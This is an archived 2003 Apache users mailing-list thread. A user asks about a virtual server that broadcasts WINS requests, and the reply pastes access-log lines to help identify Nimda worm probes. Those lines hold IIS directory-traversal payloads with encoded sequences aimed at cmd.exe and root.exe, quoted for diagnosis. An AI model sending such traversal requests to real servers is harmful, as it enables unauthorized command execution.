You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@httpd.apache.org by Jalene Joyner <Ja...@mail.state.ar.us> on 2003/01/06 18:52:06 UTC
[users@httpd] virtual host?
I have set up an Apache server (1.3.27) on a Redhat linux 7.3 with 3-4
virtual ip addresses configured. One of my virtual servers is
broadcasting messages over the intranet looking for a wins server. How
can I get this turned off and/or is this in fact an apache problem? Or
a network configuration problem on the Redhat side?
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] virtual host?
Posted by Gary Turner <kk...@sbcglobal.net>.
Jalene Joyner wrote:
>I have set up an Apache server (1.3.27) on a Redhat linux 7.3 with 3-4
>virtual ip addresses configured. One of my virtual servers is
>broadcasting messages over the intranet looking for a wins server. How
>can I get this turned off and/or is this in fact an apache problem? Or
>a network configuration problem on the Redhat side?
In the general sense, messages are not broadcast. Also, Linux and
Apache are not normally susceptible to viral or worm infections. Are
you seeing something like this in your access.log?
$tail /var/log/apache/access.log
65.71.73.123 - - [06/Jan/2003:15:12:40 -0600] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
65.71.73.123 - - [06/Jan/2003:15:12:41 -0600] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 279 "-" "-"
65.71.73.123 - - [06/Jan/2003:15:12:41 -0600] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
65.71.73.123 - - [06/Jan/2003:15:12:41 -0600] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
65.71.73.123 - - [06/Jan/2003:15:12:41 -0600] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-"
"-"
65.71.73.123 - - [06/Jan/2003:15:12:45 -0600] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 320 "-" "-"
65.71.73.123 - - [06/Jan/2003:15:12:45 -0600] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 320 "-" "-"
65.71.73.123 - - [06/Jan/2003:15:12:49 -0600] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 336 "-" "-"
65.71.73.123 - - [06/Jan/2003:15:12:49 -0600] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-"
"-"
65.71.73.123 - - [06/Jan/2003:15:12:50 -0600] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-"
"-"
If so, you are seeing attempts by an infected Microsoft system to crack
your server. Google NIMDA for more info (see the CERN ref).
If you're seeing something else, post the evidence you're seeing.
--
gt kk5st@sbcglobal.net
If someone tells you---
"I have a sense of humor, but that's not funny."
---they don't.
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org